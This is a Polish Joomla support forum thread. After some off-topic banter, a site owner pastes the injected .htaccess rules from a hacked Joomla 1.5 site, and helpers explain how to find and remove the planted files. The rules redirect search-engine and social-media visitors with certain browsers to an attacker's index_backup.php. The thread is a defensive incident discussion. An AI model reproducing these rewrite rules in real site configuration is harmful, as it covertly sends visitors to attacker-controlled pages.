ja pierniczę, jeden magister - pisze magisterkę o bezpieczeństwie i nie wie o czym, drugi - inżynier będzie budował sklep ze zrobionych już elementów.
świat oszalał, idę siku !
ja pierniczę, jeden magister - pisze magisterkę o bezpieczeństwie i nie wie o czym, drugi - inżynier będzie budował sklep ze zrobionych już elementów.
świat oszalał, idę siku !
moje nowe alter ego
@ugly kid joe i takich właśnie będziemy mieć inż. i mgr ... Jeśli takie podejście mają to raczej ciężko będzie się obronić.. Już lepszym rozwiązaniem było zlecić komuś napisanie i wykucie tej pracy na blachę heh.. Do czego oczywiście nie namawiam!
Ale pojęcie trzeba mieć a po drugie dobrać sobie promotora który będzie chętny do pomocy.. bo są tacy co zlewają wszystko i radź pan sobie sam.
Całe szczęście że to wszystko już za mną
================================Administracja Joomla, Nowości, Artykuły Pomocne Administratorom, Usługi
>>> https://joomlaguru.pl <<<
Szkoła Joomla Guru (Kursy Online)
>>> https://szkola.joomlaguru.pl <<<
================================
najgorsze jest to, że on tę pracę obroni, bo pewnie absolwent szkoły niepublicznej. ja nadal wierzę, że te publiczne realizują jeszcze jakiś program ... ale najśmieszniejsze jest to, że taki inżynier jest w stanie wysiudać z pracy przy pos'ie - w jednym z barów z bułką i kotletem - pracownika, który jest rzetelny, ale nie jest inżynierem, wszak do pracy z pos'em trzeba mieć pojęcie w co klikać i jak zrobić podsumowanie dnia.
moje nowe alter ego
w tym temacie bo sprwa dotyczy pliku htaccess mianowicie zauważyłem że obecnie plik wygląda tak:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikip edia|qq|excite|altavista|msn|netscape|aol|hotbot|g oto|infoseek|mamma|alltheweb|lycos|search|metacraw ler|bing|dogpile|facebook|twitter|blog|live|myspac e|linkedin|flickr|filesearch|yell|openstat|metabot |gigablast|entireweb|amfibi|dmoz|yippy|walhello|we bcrawler|jayde|findwhat|teoma|euroseek|wisenut|abo ut|thunderstone|ixquick|terra|lookle|metaeureka|se archspot|slider|topseven|allthesites|libero|clicke y|galaxy|brainysearch|pocketflier|verygoodsearch|b ellnet|freenet|fireball|flemiro|suchbot|acoon|deva ro|fastbot|netzindex|abacho|allesklar|suchnase|sch nellsuche|sharelook|sucharchiv|suchbiene|suchmasch ine|infospace|web|websuche|witch|wolong|oekoportal |freenet|arcor|alexana|tiscali|kataweb|voila|sfr|s tartpagina|kpnvandaag|ilse|wanadoo|telfort|hispavi sta|passagen|spray|eniro|telia|bluewin|sympatico|n lsearch|atsearch|klammeraffe|sharelook|suchknecht| ebay|abizdirectory|alltheuk|bhanvad|daffodil|click 4choice|exalead|findelio|gasta|gimpsy|globalsearch directory|hotfrog|jobrapido|kingdomseek|mojeek|sea rchers|simplyhired|splut|thisisouryear|ukkey|uwe|f riendsreunited|jaan|qp|rtl|apollo7|bricabrac|findl oo|kobala|limier|express|bestireland|browseireland |finditireland|iesearch|kompass|startsiden|confex| finnalle|gulesider|keyweb|finnfirma|kvasir|savio|s ol|startsiden|allpages|america|botw|chapu|claymont |clickz|clush|ehow|findhow|icq|westaustraliaonline )\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
Udało mi sie już doczytać że strona został zainfekowana pousuwałem już plik index_backup.php oraz inne podejrzane. teraz Chiałbym wyczyscić lub napisać poprawnie kod w pliku htaccess gdzie mógłbym znaleźć taki gotowy, kóry pasłowałby do strony - system jommla 1,5 czy wystarczyłoby abym podmienił ten plik z katalogu głownego i zamienił z txt. Czy mógłbym jednak znaleść taki kod źródłowy, kóry zabezpieczył by stronę, przed podobnymi atakami? czy ogólnie zapomnieć o sprawie ( bo ataki będą sie powtarzać) i starać się zrobić migrację do nowszej wersji joomli.
Plik htaccess znalazłem
Oprócz wskazanego i jak sądzę podmienionego pliku .htaccess sprawdź czy w głównym katalogu masz wgrane jeszcze inne obce pliki. Jeden z nich jest wskazany w tym cytowanym kodzie - index_backup.php. Być może znajdą się jeszcze inne, odpowiedzialne m.in. za wysyłanie spamu z zainfekowanej witryny. Najprędzej zlokalizujesz te pliki porównując zawartość serwera z posiadaną wcześniejszą kopią bezpieczeństwa witryny lub z zawartością paczki instalatora Joomla!. Możesz też prześledzić zawartość serwera pod kątem aktualizacji jego plików w czym pomocnym może być ten skrypt. Wgranie go do głównego katalogu serwera i wywołanie w przeglądarce pokaże listę ostatnio modyfikowanych lub wgrywanych plików, uszeregowaną według dat.
Możesz też sprawdzić pliki serwera przeszukując je na obecność w ich zawartości frazy "base64". Obecność takiej frazy z dużą dozą prawdopodobieństwa świadczy o wstawieniu takiego pliku przez włamywacza.
Wielkie dzięki będę próbował to wszystko naprawić.
Mam pytanie w jaki sposób mógłbym przeszukiwać pliki po ich zawartości, bo na pewno bu mi to ułatwiło wyszukiwanie i ewentualnie wykasowanie plików obecnie muszę wkochdzić do każdego katalogu i ręcznie usuwać lub je modyfikować. Czy jest to uzależnione od dostawcy serwera - cy są mozę programy, kóre dają taką możliwość korzystam z winscp do połączenia?
By przeszukać zawartość plików trzeba je najpierw pobrać z serwera, najlepiej za pomocą komponentu Akeeba, tworząc zarazem kopię bezpieczeństwa witryny, w tym przypadku lepiej by była ona zrobiona w formacie archiwum zip (dla łatwiejszego rozpakowania, choć zalecany format jpa też można rozpakować, ale specjalnym narzędziem - Akeeba eXtract Wizard). Tak przygotowaną kopię bezpieczeństwa należy pobrać i rozpakować na dysku swojego komputera i przeszukać za pomocą np. Total Commandera (Polecenia=>Znajdź=>opcja Znajdź tekst), wskazując w wyszukiwaniu podany tekst base64.